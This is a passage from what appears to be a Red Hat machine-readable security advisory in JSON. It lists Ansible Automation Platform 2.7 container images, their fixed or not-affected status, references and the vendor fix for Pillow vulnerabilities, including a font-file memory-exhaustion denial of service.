"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Memory disclosure or denial of service via crafted McIdas AREA image"
},
{
"cve": "CVE-2026-54060",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2026-07-06T20:02:29.509113+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497466"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. When processing a specially crafted font file, the library\u0027s font compilation function does not adequately check for excessive memory allocation. This oversight allows a remote attacker to trigger an unreasonable consumption of system memory, leading to a denial of service (DoS) for the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via excessive memory allocation when processing font files",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in Pillow prior to version 12.3.0. The FontFile.compile() method in PIL/FontFile.py assembles per-glyph images into a combined bitmap using Image.new() without calling Image._decompression_bomb_check(). This allows a specially crafted font file to trigger excessive memory allocation during conversion or saving, leading to denial of service via resource exhaustion.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54060"
},
{
"category": "external",
"summary": "RHBZ#2497466",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497466"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54060",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54060"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54060",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54060"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d",
"url": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5x94-69rx-g8h2",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5x94-69rx-g8h2"
}
],
"release_date": "2026-07-06T18:49:23.788000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
